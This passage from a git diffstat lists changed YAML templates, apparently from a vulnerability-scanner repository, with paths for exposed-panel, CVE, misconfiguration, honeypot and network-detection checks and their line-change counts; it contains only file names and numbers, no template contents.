+- http/exposed-panels/omniampx-panel.yaml | 2 +- .../onlyoffice-login-panel.yaml | 10 ++-- .../open-stack-dashboard-login.yaml | 2 +- .../open-virtualization-manager-panel.yaml | 2 +- http/exposed-panels/openam-panel.yaml | 8 +++- http/exposed-panels/openbullet2-panel.yaml | 2 +- http/exposed-panels/opencart-panel.yaml | 12 +++-- http/exposed-panels/opencats-panel.yaml | 12 +++-- http/exposed-panels/openemr-detect.yaml | 16 +++++-- http/exposed-panels/openerp-database.yaml | 7 ++- http/exposed-panels/openfire-admin-panel.yaml | 17 +++++-- http/exposed-panels/opengear-panel.yaml | 4 +- http/exposed-panels/opennebula-panel.yaml | 2 +- http/exposed-panels/opennms-web-console.yaml | 2 +- http/exposed-panels/opensis-panel.yaml | 8 +++- .../opentouch-multimediaservices-panel.yaml | 2 +- http/exposed-panels/openvas-panel.yaml | 2 +- http/exposed-panels/openvpn-admin.yaml | 16 +++++-- http/exposed-panels/openvpn-connect.yaml | 6 ++- .../openvpn-router-management.yaml | 16 +++++-- http/exposed-panels/openvz-web-login.yaml | 2 +- http/exposed-panels/openwebui-panel.yaml | 28 +++++------ http/exposed-panels/openwrt-login.yaml | 8 +++- .../openwrt/openwrt-luci-panel.yaml | 8 +++- http/exposed-panels/openx-panel.yaml | 15 ++++-- http/exposed-panels/opinio-panel.yaml | 2 +- .../oracle-access-management.yaml | 42 ++++++++++------- .../oracle-business-control.yaml | 11 +++-- .../oracle-business-intelligence.yaml | 12 +++-- .../oracle-ebusiness-panel.yaml | 28 +++++------ .../oracle-enterprise-manager-login.yaml | 2 +- http/exposed-panels/oracle-opera-login.yaml | 2 +- .../oracle-people-enterprise.yaml | 8 +++- .../oracle-peoplesoft-panel.yaml | 6 +-- http/exposed-panels/orchid-vms-panel.yaml | 8 +++- http/exposed-panels/osticket-panel.yaml | 19 ++++++-- .../osticket/osticket-install.yaml | 19 ++++++-- http/exposed-panels/ourmgmt3-panel.yaml | 2 +- .../outsystems-servicecenter-panel.yaml | 4 +- http/exposed-panels/overseerr-panel.yaml | 4 +- http/exposed-panels/pahtool-panel.yaml | 2 +- http/exposed-panels/pairdrop-panel.yaml | 2 +- http/exposed-panels/panabit-panel.yaml | 2 +- http/exposed-panels/pandora-fms-console.yaml | 5 +- http/exposed-panels/papercut-ng-panel.yaml | 17 +++++-- .../parallels/parallels-hsphere-detect.yaml | 17 +++++-- http/exposed-panels/parse-dashboard.yaml | 12 +++-- http/exposed-panels/passbolt-panel.yaml | 2 +- .../payroll-management-system-panel.yaml | 2 +- http/exposed-panels/pdi-device-page.yaml | 2 +- http/exposed-panels/pega-web-panel.yaml | 16 +++++-- http/exposed-panels/pentaho-panel.yaml | 2 + http/exposed-panels/persis-panel.yaml | 2 +- http/exposed-panels/pfsense-login.yaml | 11 +++-- http/exposed-panels/phabricator-login.yaml | 7 ++- http/exposed-panels/phoronix-pane.yaml | 4 +- http/exposed-panels/php-mailer.yaml | 2 +- http/exposed-panels/phpcollab-panel.yaml | 8 +++- http/exposed-panels/phpldapadmin-panel.yaml | 2 +- http/exposed-panels/phpminiadmin-panel.yaml | 2 +- http/exposed-panels/phpmyadmin-panel.yaml | 15 ++++-- http/exposed-panels/phppgadmin-panel.yaml | 13 ++++-- http/exposed-panels/pichome-panel.yaml | 2 +- http/exposed-panels/piwigo-panel.yaml | 12 +++-- http/exposed-panels/planet-estream-panel.yaml | 12 +++-- http/exposed-panels/plausible-panel.yaml | 2 +- http/exposed-panels/plesk-obsidian-login.yaml | 15 ++++-- http/exposed-panels/plesk-onyx-login.yaml | 15 ++++-- http/exposed-panels/pocketbase-panel.yaml | 30 ++++++------ http/exposed-panels/polycom-admin-detect.yaml | 2 +- http/exposed-panels/portainer-panel.yaml | 12 +++-- http/exposed-panels/posteio-admin-panel.yaml | 2 +- http/exposed-panels/posthog-admin-panel.yaml | 6 ++- .../powercom-network-manager.yaml | 2 +- http/exposed-panels/powerjob-panel.yaml | 4 +- http/exposed-panels/powerlogic-ion.yaml | 2 +- http/exposed-panels/processwire-login.yaml | 5 +- .../exposed-panels/project-insight-login.yaml | 8 +++- http/exposed-panels/projectsend-login.yaml | 8 +++- .../prometheus-exposed-panel.yaml | 2 +- .../proofpoint-protection-server-panel.yaml | 5 +- http/exposed-panels/proxmox-panel.yaml | 5 +- http/exposed-panels/pulsar-admin-console.yaml | 17 +++++-- http/exposed-panels/pulsar-adminui-panel.yaml | 17 +++++-- .../exposed-panels/pulsar360-admin-panel.yaml | 2 +- http/exposed-panels/pulse-secure-version.yaml | 3 +- http/exposed-panels/puppetboard-panel.yaml | 2 +- http/exposed-panels/pure-storage-login.yaml | 8 +++- http/exposed-panels/pyload-panel.yaml | 20 ++++++-- http/exposed-panels/pypicloud-panel.yaml | 2 +- http/exposed-panels/qBittorrent-panel.yaml | 12 +++-- http/exposed-panels/qdpm-login-panel.yaml | 5 +- http/exposed-panels/qlik-sense-server.yaml | 20 ++++++-- .../qlikview-accesspoint-panel.yaml | 28 +++++------ http/exposed-panels/qmail-admin-login.yaml | 12 +++-- .../qnap/qnap-photostation-panel.yaml | 18 ++++++-- http/exposed-panels/qnap/qnap-qts-panel.yaml | 16 +++++-- http/exposed-panels/qualcomm-voip-router.yaml | 2 +- http/exposed-panels/qualtrics-login.yaml | 2 +- .../exposed-panels/quantum-scalar-detect.yaml | 2 +- http/exposed-panels/quilium-panel.yaml | 2 +- http/exposed-panels/rabbitmq-dashboard.yaml | 3 +- http/exposed-panels/racksnet-login.yaml | 2 +- http/exposed-panels/rancher-dashboard.yaml | 11 +++-- http/exposed-panels/rancher-panel.yaml | 5 +- http/exposed-panels/rcdevs-webadm-panel.yaml | 2 +- http/exposed-panels/rdweb-panel.yaml | 9 ++-- http/exposed-panels/red-lion-panel.yaml | 2 +- http/exposed-panels/redash-panel.yaml | 3 +- .../redhat/redhat-satellite-panel.yaml | 2 +- .../redis-enterprise-panel.yaml | 2 +- http/exposed-panels/redmine-panel.yaml | 2 +- http/exposed-panels/regify-panel.yaml | 2 +- http/exposed-panels/remedy-axis-login.yaml | 2 +- .../exposed-panels/repetier-server-panel.yaml | 12 +++-- .../exposed-panels/reportico-admin-panel.yaml | 12 +++-- .../residential-gateway-login.yaml | 2 +- http/exposed-panels/retool-login.yaml | 2 +- http/exposed-panels/riseup-panel.yaml | 2 +- http/exposed-panels/rocketchat-panel.yaml | 2 +- .../rocketmq-console-exposure.yaml | 18 ++++++-- http/exposed-panels/room-alert-detect.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 12 +++-- .../royalevent-management-panel.yaml | 2 +- .../ruckus-unleashed-panel.yaml | 11 +++-- .../ruckus-wireless-admin-login.yaml | 12 +++-- http/exposed-panels/ruijie/rg-uac-panel.yaml | 7 ++- http/exposed-panels/rundeck-login.yaml | 2 +- .../rustici-content-controller.yaml | 2 +- .../safenet-authentication-panel.yaml | 3 +- http/exposed-panels/sage-panel.yaml | 8 +++- .../saltstack-config-panel.yaml | 2 +- http/exposed-panels/samba-swat-panel.yaml | 2 +- .../samsung-printer-detect.yaml | 6 ++- http/exposed-panels/sap-cloud-analytics.yaml | 2 +- http/exposed-panels/sap-netweaver-portal.yaml | 2 +- .../sap-successfactors-detect.yaml | 12 +++-- http/exposed-panels/sapfiori-panel.yaml | 2 +- http/exposed-panels/sas-login-panel.yaml | 5 +- http/exposed-panels/satis-repository.yaml | 2 +- .../sauter-moduwebvision-panel.yaml | 5 +- .../scribble-diffusion-panel.yaml | 2 +- .../scriptcase/scriptcase-panel.yaml | 2 +- .../scriptcase/scriptcase-prod-login.yaml | 2 +- http/exposed-panels/seafile-panel.yaml | 5 +- http/exposed-panels/seagate-nas-login.yaml | 12 +++-- http/exposed-panels/securepoint-utm.yaml | 2 +- http/exposed-panels/security-onion-panel.yaml | 12 +++-- http/exposed-panels/seeddms-panel.yaml | 8 +++- http/exposed-panels/selfcheck-panel.yaml | 2 +- http/exposed-panels/sensu-panel.yaml | 2 +- http/exposed-panels/sentinelone-console.yaml | 2 +- http/exposed-panels/sentry-panel.yaml | 12 +++-- .../servicedesk-login-panel.yaml | 7 ++- http/exposed-panels/servicenow-panel.yaml | 14 ++++-- .../sevone-nms-network-manager.yaml | 2 +- http/exposed-panels/shardingsphere-panel.yaml | 5 +- http/exposed-panels/sharefile-panel.yaml | 12 +++-- http/exposed-panels/shell-box.yaml | 5 +- http/exposed-panels/sidekiq-dashboard.yaml | 5 +- .../signet-explorer-dashboard.yaml | 2 +- http/exposed-panels/sitefinity-login.yaml | 2 +- http/exposed-panels/siteomat-login.yaml | 2 +- http/exposed-panels/skeepers-panel.yaml | 2 +- http/exposed-panels/skycaiji-admin-panel.yaml | 2 +- http/exposed-panels/smartping-dashboard.yaml | 2 +- http/exposed-panels/snapcomms-panel.yaml | 2 +- http/exposed-panels/softether-vpn-panel.yaml | 2 +- .../solarview-compact-panel.yaml | 16 +++++-- http/exposed-panels/solarwinds-arm-panel.yaml | 9 ++-- http/exposed-panels/solarwinds-orion.yaml | 2 +- .../solarwinds-servuftp-detect.yaml | 3 +- http/exposed-panels/solr-panel-exposure.yaml | 18 ++++++-- http/exposed-panels/somansa-dlp-detect.yaml | 2 +- http/exposed-panels/sonarqube-login.yaml | 2 +- .../sonic-wall-application.yaml | 12 +++-- http/exposed-panels/sonic-wall-login.yaml | 12 +++-- .../sonicwall-analyzer-login.yaml | 12 +++-- .../sonicwall-management-panel.yaml | 2 +- .../sonicwall-sslvpn-panel.yaml | 3 +- .../sophos-fw-version-detect.yaml | 12 +++-- http/exposed-panels/sophos-mobile-panel.yaml | 11 ++++- http/exposed-panels/sophos-web-appliance.yaml | 14 ++++-- .../exposed-panels/spacelogic-cbus-panel.yaml | 11 +++-- http/exposed-panels/spark-panel.yaml | 15 ++++-- http/exposed-panels/speedtest-panel.yaml | 2 +- http/exposed-panels/sphider-login.yaml | 2 +- http/exposed-panels/sphinxonline-panel.yaml | 2 +- .../splunk-enterprise-panel.yaml | 8 +++- http/exposed-panels/spotweb-login-panel.yaml | 12 +++-- http/exposed-panels/sql-monitor.yaml | 7 ++- http/exposed-panels/sqlbuddy-panel.yaml | 2 +- http/exposed-panels/squirrelmail-login.yaml | 9 +++- .../exposed-panels/sqwebmail-login-panel.yaml | 2 +- http/exposed-panels/star-network-utility.yaml | 2 +- http/exposed-panels/steve-login-panel.yaml | 4 +- http/exposed-panels/storybook-panel.yaml | 2 +- http/exposed-panels/strapi-documentation.yaml | 2 +- http/exposed-panels/strapi-panel.yaml | 2 +- http/exposed-panels/structurizr-panel.yaml | 5 +- http/exposed-panels/subrion-login.yaml | 2 +- http/exposed-panels/sugarcrm-panel.yaml | 12 ++++- http/exposed-panels/sunbird-dcim-panel.yaml | 2 +- .../sungrow-logger1000-detect.yaml | 2 +- http/exposed-panels/superadmin-ui-panel.yaml | 2 +- http/exposed-panels/supermicro-bmc-panel.yaml | 2 +- http/exposed-panels/superset-login.yaml | 13 ++++-- .../syfadis-xperience-panel.yaml | 2 +- .../symantec/symantec-dlp-login.yaml | 8 +++- .../symantec/symantec-epm-login.yaml | 8 +++- .../symantec/symantec-iam-console.yaml | 2 +- .../symantec/symantec-phishing-panel.yaml | 2 +- .../synapse-mobility-panel.yaml | 2 +- http/exposed-panels/syncserver-panel.yaml | 11 +++-- http/exposed-panels/syncthru-web-service.yaml | 12 +++-- .../synopsys-coverity-panel.yaml | 2 +- http/exposed-panels/sysaid-panel.yaml | 4 +- http/exposed-panels/tableau-panel.yaml | 2 +- .../tableau-service-manager.yaml | 12 +++-- http/exposed-panels/tailon-panel.yaml | 2 +- http/exposed-panels/tautulli-panel.yaml | 17 +++++-- http/exposed-panels/teamcity-login-panel.yaml | 13 ++++-- http/exposed-panels/teamforge-panel.yaml | 4 +- http/exposed-panels/teampass-panel.yaml | 5 +- http/exposed-panels/tekton-dashboard.yaml | 2 +- http/exposed-panels/telerik-server-login.yaml | 2 +- .../telesquare/tlr-2005ksh-login.yaml | 11 +++-- http/exposed-panels/teltonika-login.yaml | 2 +- http/exposed-panels/tembosocial-panel.yaml | 2 +- .../tenda-11n-wireless-router-login.yaml | 2 +- http/exposed-panels/tenda-web-master.yaml | 2 +- http/exposed-panels/teradek-panel.yaml | 2 +- http/exposed-panels/teradici-pcoip-panel.yaml | 2 +- .../terraform-enterprise-panel.yaml | 11 +++-- .../thinfinity-virtualui-panel.yaml | 8 +++- http/exposed-panels/thruk-login.yaml | 8 +++- http/exposed-panels/tibco-spotfire-panel.yaml | 2 +- http/exposed-panels/tigase-xmpp-server.yaml | 2 +- http/exposed-panels/tikiwiki-cms.yaml | 4 +- http/exposed-panels/tiny-file-manager.yaml | 2 +- http/exposed-panels/tiny-rss-panel.yaml | 28 +++++------ http/exposed-panels/tixeo-panel.yaml | 27 ++++++----- .../tomcat/tomcat-exposed-docs.yaml | 12 ++++- http/exposed-panels/tooljet-panel.yaml | 2 +- .../total-web-solutions-panel.yaml | 4 +- http/exposed-panels/totemomail-panel.yaml | 12 +++-- http/exposed-panels/tracer-sc-login.yaml | 2 +- http/exposed-panels/traefik-dashboard.yaml | 6 ++- .../trendnet/trendnet-tew827dru-login.yaml | 7 ++- http/exposed-panels/truenas-scale-panel.yaml | 11 +++-- .../tufin-securetrack-login.yaml | 11 +++-- http/exposed-panels/tup-openframe.yaml | 2 +- http/exposed-panels/turnkey-openvpn.yaml | 2 +- http/exposed-panels/typo3-login.yaml | 3 +- .../uipath-orchestrator-panel.yaml | 28 +++++------ http/exposed-panels/umbraco-login.yaml | 12 +++-- .../unauth-xproxy-dashboard.yaml | 2 +- .../unauth/tautulli-unauth.yaml | 17 +++++-- http/exposed-panels/unibox-panel.yaml | 2 +- http/exposed-panels/unleash-panel.yaml | 28 +++++------ http/exposed-panels/untangle-admin-login.yaml | 12 +++-- http/exposed-panels/uptime-kuma-panel.yaml | 2 +- http/exposed-panels/v2924-admin-panel.yaml | 2 +- http/exposed-panels/vault-panel.yaml | 5 +- http/exposed-panels/veeam-backup-gcp.yaml | 2 +- http/exposed-panels/veriz0wn-osint.yaml | 2 +- http/exposed-panels/verizon-router-panel.yaml | 2 +- .../versa/versa-director-login.yaml | 2 +- .../versa/versa-flexvnf-panel.yaml | 2 +- http/exposed-panels/vertex-tax-panel.yaml | 2 +- http/exposed-panels/vinchin-panel.yaml | 2 +- .../exposed-panels/virtua-software-panel.yaml | 5 +- http/exposed-panels/vistaweb-panel.yaml | 2 +- .../vmware-carbon-black-edr.yaml | 2 +- .../vmware-cloud-availability.yaml | 2 +- .../exposed-panels/vmware-cloud-director.yaml | 12 +++-- http/exposed-panels/vmware-ftp-server.yaml | 2 +- http/exposed-panels/vmware-hcx-login.yaml | 2 +- http/exposed-panels/vmware-horizon-daas.yaml | 12 +++-- http/exposed-panels/vmware-horizon-panel.yaml | 2 +- http/exposed-panels/vmware-nsx-login.yaml | 2 +- .../vmware-vcenter-converter-standalone.yaml | 12 +++-- .../vmware-vcloud-director.yaml | 12 +++-- http/exposed-panels/vodafone-voxui-panel.yaml | 2 +- http/exposed-panels/voipmonitor-panel.yaml | 8 +++- .../vrealize-loginsight-panel.yaml | 12 +++-- http/exposed-panels/vue-pacs-panel.yaml | 12 +++-- http/exposed-panels/wagtail-cms-detect.yaml | 12 +++-- http/exposed-panels/wampserver-homepage.yaml | 2 +- http/exposed-panels/watcher-panel.yaml | 2 +- http/exposed-panels/watchguard-panel.yaml | 2 +- http/exposed-panels/watershed-panel.yaml | 2 +- http/exposed-panels/wazuh-panel.yaml | 8 +++- http/exposed-panels/wd-mycloud-panel.yaml | 5 +- http/exposed-panels/web-file-manager.yaml | 2 +- http/exposed-panels/web-viewer-panel.yaml | 12 +++-- http/exposed-panels/webcomco-panel.yaml | 2 +- .../webeditors-check-detect.yaml | 3 +- http/exposed-panels/weblogic-login.yaml | 9 +++- .../exposed-panels/weblogic-uddiexplorer.yaml | 7 ++- http/exposed-panels/webmin-panel.yaml | 5 +- http/exposed-panels/webmodule-ee-panel.yaml | 2 +- http/exposed-panels/webroot-login.yaml | 2 +- .../exposed-panels/webshell4-login-panel.yaml | 2 +- http/exposed-panels/webtitan-cloud-panel.yaml | 9 ++-- .../webtransfer-client-panel.yaml | 2 +- http/exposed-panels/webuzo-admin-panel.yaml | 12 +++-- http/exposed-panels/weiphp-panel.yaml | 13 ++++-- http/exposed-panels/whm-login-detect.yaml | 2 +- http/exposed-panels/wiren-board-webui.yaml | 2 +- http/exposed-panels/wmw-enterprise-panel.yaml | 2 +- http/exposed-panels/wordpress-login.yaml | 5 +- http/exposed-panels/workspace-one-uem.yaml | 11 +++-- .../wowza-streaming-engine.yaml | 9 +++- .../ws_ftp-server-web-transfer.yaml | 22 +++++++-- .../wso2-management-console.yaml | 4 +- http/exposed-panels/xeams-admin-console.yaml | 12 +++-- http/exposed-panels/xenmobile-login.yaml | 2 +- http/exposed-panels/xfinity-panel.yaml | 2 +- http/exposed-panels/xibocms-login.yaml | 2 +- http/exposed-panels/xnat-login.yaml | 2 +- .../xoops/xoops-installation-wizard.yaml | 2 +- http/exposed-panels/xvr-login.yaml | 8 +++- http/exposed-panels/xweb500-panel.yaml | 2 +- http/exposed-panels/xxljob-panel.yaml | 5 +- .../exposed-panels/yarn-manager-exposure.yaml | 2 +- http/exposed-panels/yellowfin-panel.yaml | 2 +- http/exposed-panels/yzmcms-panel.yaml | 8 +++- http/exposed-panels/zabbix-server-login.yaml | 12 ++++- .../zblog-exposed-admin-panel.yaml | 6 ++- http/exposed-panels/zenario-login-panel.yaml | 2 +- http/exposed-panels/zentao-detect.yaml | 2 +- http/exposed-panels/zeroshell-login.yaml | 8 +++- http/exposed-panels/zimbra-web-client.yaml | 17 +++++-- http/exposed-panels/zimbra-web-login.yaml | 17 +++++-- http/exposed-panels/zipkin-exposure.yaml | 2 +- .../zoho/manageengine-adaudit.yaml | 12 +++-- .../zoho/manageengine-adselfservice.yaml | 17 +++++-- .../zoho/manageengine-analytics.yaml | 9 +++- .../zoho/manageengine-apex-helpdesk.yaml | 10 +++- .../manageengine-applications-manager.yaml | 2 +- .../zoho/manageengine-assetexplorer.yaml | 8 +++- .../zoho/manageengine-desktop.yaml | 10 +++- .../zoho/manageengine-network-config.yaml | 12 +++-- .../zoho/manageengine-opmanager.yaml | 8 +++- .../zoho/manageengine-servicedesk.yaml | 8 +++- .../zoho/manageengine-supportcenter.yaml | 8 +++- http/exposed-panels/zoneminder-login.yaml | 4 +- http/exposed-panels/zte-panel.yaml | 2 +- http/exposed-panels/zyxel-router-panel.yaml | 12 +++-- .../zyxel/zyxel-firewall-panel.yaml | 2 +- .../zyxel/zyxel-vmg1312b10d-login.yaml | 11 +++-- .../zyxel/zyxel-vsg1432b101-login.yaml | 2 +- .../apis/drupal-jsonapi-user-listing.yaml | 6 ++- http/exposures/configs/deployment-ini.yaml | 7 +-- http/exposures/files/generic-db.yaml | 2 +- http/exposures/files/ht-deployment.yaml | 4 +- .../files/wordpress-readme-file.yaml | 6 ++- http/exposures/logs/milesight-system-log.yaml | 3 ++ http/fuzzing/cache-poisoning-fuzz.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/prestashop-module-fuzz.yaml | 2 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-plugins-detect.yaml | 2 +- http/fuzzing/wordpress-themes-detect.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/fuzzing/xff-403-bypass.yaml | 2 +- http/honeypot/citrix-honeypot-detect.yaml | 6 ++- .../dionaea-http-honeypot-detect.yaml | 1 + http/honeypot/snare-honeypot-detect.yaml | 4 +- http/honeypot/tpot-honeypot-detect.yaml | 21 +++++---- http/iot/kyocera-printer-panel.yaml | 3 ++ http/iot/netgear-boarddataww-rce.yaml | 2 +- .../balada-injector-malware.yaml | 2 +- .../cloudflare-rocketloader-htmli.yaml | 2 +- http/miscellaneous/defacement-detect.yaml | 2 +- http/miscellaneous/directory-listing.yaml | 5 +- http/miscellaneous/form-detection.yaml | 4 +- http/miscellaneous/microsoft-azure-error.yaml | 2 +- .../aws/cdn-cache-poisoning.yaml | 2 +- http/misconfiguration/corebos-htaccess.yaml | 3 ++ .../dlink-unauth-cgi-script.yaml | 3 +- .../dont-panic-traceback.yaml | 2 +- http/misconfiguration/doris-dashboard.yaml | 2 +- .../drupal/drupal-user-enum-ajax.yaml | 6 ++- http/misconfiguration/filebrowser-unauth.yaml | 3 ++ .../genieacs-default-jwt.yaml | 7 ++- .../h2o/h2o-arbitary-file-read.yaml | 2 +- .../https-to-http-redirect.yaml | 2 +- http/misconfiguration/imgproxy-unauth.yaml | 35 +++++++------- .../installer/drupal-install.yaml | 6 ++- .../installer/eyoucms-installer.yaml | 2 + .../installer/gibbon-installer.yaml | 3 ++ .../installer/ids-skills-installer.yaml | 2 +- .../installer/trilium-notes-installer.yaml | 3 +- .../installer/zabbix-installer.yaml | 12 ++++- .../intelbras-dvr-unauth.yaml | 3 +- http/misconfiguration/mlflow-unauth.yaml | 6 +++ .../node-express-dev-env.yaml | 3 +- .../php/php-composer-binary.yaml | 2 +- .../sap/sap-netweaver-info-leak.yaml | 3 ++ .../thanos-prometheus-exposure.yaml | 2 +- .../unigui-server-monitor-exposure.yaml | 30 ++++++------ http/osint/user-enumeration/piratebay.yaml | 2 +- http/takeovers/worksites-takeover.yaml | 2 +- .../apache/apache-answer-detect.yaml | 4 +- http/technologies/apache/tomcat-detect.yaml | 13 ++++-- http/technologies/arcgis-rest-api.yaml | 2 +- http/technologies/arcgis-tokens.yaml | 8 +++- http/technologies/boa-web-server.yaml | 2 +- http/technologies/celebrus-detect.yaml | 28 +++++------ .../citrix-xenmobile-version.yaml | 4 +- http/technologies/confluence-detect.yaml | 4 +- http/technologies/cowboy-detect.yaml | 2 +- http/technologies/craftercms-detect.yaml | 28 +++++------ http/technologies/erxes-detect.yaml | 4 ++ http/technologies/harbor-detect.yaml | 3 ++ http/technologies/hikvision-detect.yaml | 3 ++ http/technologies/jenkins-detect.yaml | 6 ++- http/technologies/jira-detect.yaml | 4 ++ http/technologies/meilisearch-detect.yaml | 28 +++++------ .../microfocus-iprint-detect.yaml | 2 +- http/technologies/microweber-detect.yaml | 9 +++- http/technologies/monstracms-detect.yaml | 3 ++ http/technologies/piwigo-detect.yaml | 8 +++- http/technologies/privatebin-detect.yaml | 28 +++++------ .../sap/sap-netweaver-detect.yaml | 6 ++- .../sap/sap-web-dispatcher-admin-portal.yaml | 3 ++ http/technologies/simplesamlphp-detect.yaml | 4 +- http/technologies/sparklighter-detect.yaml | 9 +++- .../tibco-spotfire-services-detect.yaml | 2 +- http/technologies/uni-gui-framework.yaml | 24 +++++----- http/technologies/wordpress-detect.yaml | 5 +- .../themes/wp-bricks-builder-theme.yaml | 28 +++++------ http/technologies/yourls-detect.yaml | 2 +- http/token-spray/api-mailchimp.yaml | 2 +- http/token-spray/api-sendgrid.yaml | 2 +- http/token-spray/api-travisci.yaml | 2 +- .../backdoor/cisco-implant-detect.yaml | 2 + .../citrix/citrix-oob-memory-read.yaml | 4 +- .../ecstatic/node-ecstatic-listing.yaml | 2 +- .../esafenet/esafenet-mysql-fileread.yaml | 2 + .../huatian/huatian-oa-sqli.yaml | 3 +- .../jorani/jorani-benjamin-xss.yaml | 3 ++ http/vulnerabilities/kkfileview-ssrf.yaml | 9 +++- http/vulnerabilities/other/array-vpn-lfi.yaml | 4 +- http/vulnerabilities/other/cerio-dt-rce.yaml | 2 +- .../other/easycvr-info-leak.yaml | 4 +- .../vulnerabilities/other/microweber-xss.yaml | 9 +++- http/vulnerabilities/other/pmb-xss.yaml | 9 +++- .../vulnerabilities/other/quick-cms-sqli.yaml | 2 +- .../other/tendat-credential.yaml | 3 +- http/vulnerabilities/other/tikiwiki-xss.yaml | 3 ++ ...estashop-blocktestimonial-file-upload.yaml | 3 +- ...tashop-cartabandonmentpro-file-upload.yaml | 9 ++-- .../weaver/weaver-uploadify-file-upload.yaml | 2 +- .../wordpress-accessible-wpconfig.yaml | 2 +- .../wordpress/wordpress-wordfence-xss.yaml | 2 +- .../wordpress/wordpress-zebra-form-xss.yaml | 2 +- .../wordpress/wp-ambience-xss.yaml | 2 +- .../wordpress/wp-custom-tables-xss.yaml | 2 +- .../wordpress/wp-finder-xss.yaml | 2 +- .../wordpress/wp-flagem-xss.yaml | 2 +- .../wordpress/wp-knews-xss.yaml | 2 +- .../wordpress/wp-nextgen-xss.yaml | 2 +- .../wordpress/wp-phpfreechat-xss.yaml | 2 +- .../wordpress/wp-securimage-xss.yaml | 2 +- .../wordpress/wp-slideshow-xss.yaml | 2 +- .../wordpress/wp-under-construction-ssrf.yaml | 2 +- .../wordpress/wp-user-enum.yaml | 5 +- javascript/backdoor/proftpd-backdoor.yaml | 4 +- javascript/cves/2012/CVE-2012-2122.yaml | 12 +++-- javascript/cves/2019/CVE-2019-9193.yaml | 4 +- javascript/cves/2020/CVE-2020-7247.yaml | 5 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/cves/2023/CVE-2023-46604.yaml | 5 +- javascript/cves/2023/CVE-2023-48795.yaml | 8 ++-- javascript/cves/2024/CVE-2024-23897.yaml | 8 +++- .../default-logins/redis-default-logins.yaml | 15 +++++- javascript/detection/samba-detect.yaml | 3 +- .../enumeration/checkpoint-firewall-enum.yaml | 3 +- javascript/enumeration/minecraft-enum.yaml | 3 +- .../mysql/mysql-default-login.yaml | 2 +- javascript/enumeration/mysql/mysql-info.yaml | 2 +- .../enumeration/pgsql/pgsql-default-db.yaml | 6 +-- .../enumeration/pgsql/pgsql-file-read.yaml | 6 +-- .../pgsql/pgsql-list-database.yaml | 6 +-- .../pgsql/pgsql-list-password-hashes.yaml | 6 +-- .../enumeration/pgsql/pgsql-list-users.yaml | 4 +- .../pgsql/pgsql-version-detect.yaml | 4 +- .../pop3/pop3-capabilities-enum.yaml | 3 +- javascript/enumeration/redis/redis-info.yaml | 17 +++++-- .../enumeration/redis/redis-require-auth.yaml | 17 +++++-- .../enumeration/rsync/rsync-list-modules.yaml | 5 +- .../enumeration/smb/smb-default-creds.yaml | 3 +- .../enumeration/smb/smb-enum-domains.yaml | 2 + javascript/enumeration/smb/smb-enum.yaml | 3 +- javascript/enumeration/smb/smb-os-detect.yaml | 2 + .../enumeration/smb/smb-version-detect.yaml | 2 + .../enumeration/smb/smb2-capabilities.yaml | 3 +- .../enumeration/smb/smb2-server-time.yaml | 2 + .../pgsql/pgsql-empty-password.yaml | 4 +- .../pgsql/pgsql-extensions-rce.yaml | 4 +- .../smb/smb-anonymous-access.yaml | 2 + .../misconfiguration/smb/smb-shares.yaml | 2 + .../smb/smb-signing-not-required.yaml | 2 + javascript/udp/detection/tftp-detect.yaml | 4 +- network/backdoor/backdoored-zte.yaml | 5 +- network/c2/darkcomet-trojan.yaml | 2 +- network/c2/darktrack-rat-trojan.yaml | 2 +- network/c2/orcus-rat-trojan.yaml | 2 +- network/c2/xtremerat-trojan.yaml | 2 +- network/cves/2001/CVE-2001-1473.yaml | 10 ++-- network/cves/2011/CVE-2011-2523.yaml | 5 +- network/cves/2015/CVE-2015-3306.yaml | 8 ++-- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2016/CVE-2016-3510.yaml | 11 +++-- network/cves/2017/CVE-2017-3881.yaml | 5 +- network/cves/2017/CVE-2017-5645.yaml | 2 +- network/cves/2018/CVE-2018-2628.yaml | 7 ++- network/cves/2018/CVE-2018-2893.yaml | 7 ++- network/cves/2020/CVE-2020-11981.yaml | 18 ++++++-- network/cves/2020/CVE-2020-1938.yaml | 8 +++- network/cves/2021/CVE-2021-44521.yaml | 7 +-- network/cves/2022/CVE-2022-0543.yaml | 9 ++-- network/cves/2022/CVE-2022-24706.yaml | 7 ++- network/cves/2022/CVE-2022-31793.yaml | 2 +- network/cves/2023/CVE-2023-33246.yaml | 23 +++++++--- .../default-login/ftp-anonymous-login.yaml | 2 +- .../default-login/ftp-weak-credentials.yaml | 2 +- .../default-login/ldap-anonymous-login.yaml | 5 +- .../activemq-openwire-transport-detect.yaml | 5 +- network/detection/aix-websm-detect.yaml | 5 +- network/detection/apache-activemq-detect.yaml | 5 +- network/detection/aws-sftp-detect.yaml | 5 +- .../detection/axigen-mail-server-detect.yaml | 7 ++- network/detection/bgp-detect.yaml | 2 +- network/detection/bitvise-ssh-detect.yaml | 5 +- .../bluecoat-telnet-proxy-detect.yaml | 5 +- network/detection/cisco-finger-detect.yaml | 5 +- network/detection/clamav-detect.yaml | 5 +- network/detection/cql-native-transport.yaml | 5 +- .../detection/detect-addpac-voip-gateway.yaml | 2 +- network/detection/detect-jabber-xmpp.yaml | 2 +- .../dotnet-remoting-service-detect.yaml | 5 +- network/detection/esmtp-detect.yaml | 7 ++- network/detection/exim-detect.yaml | 7 ++- network/detection/expn-mail-detect.yaml | 4 +- network/detection/finger-detect.yaml | 5 +- .../detection/gnu-inetutils-ftpd-detect.yaml | 5 +- network/detection/gopher-detect.yaml | 2 +- .../detection/ibm-d2b-database-server.yaml | 5 +- network/detection/imap-detect.yaml | 5 +- network/detection/iplanet-imap-detect.yaml | 5 +- network/detection/java-rmi-detect.yaml | 2 +- network/detection/microsoft-ftp-service.yaml | 5 +- .../detection/mikrotik-ftp-server-detect.yaml | 5 +- network/detection/mikrotik-routeros-api.yaml | 5 +- network/detection/mongodb-detect.yaml | 2 +- network/detection/moveit-sftp-detect.yaml | 2 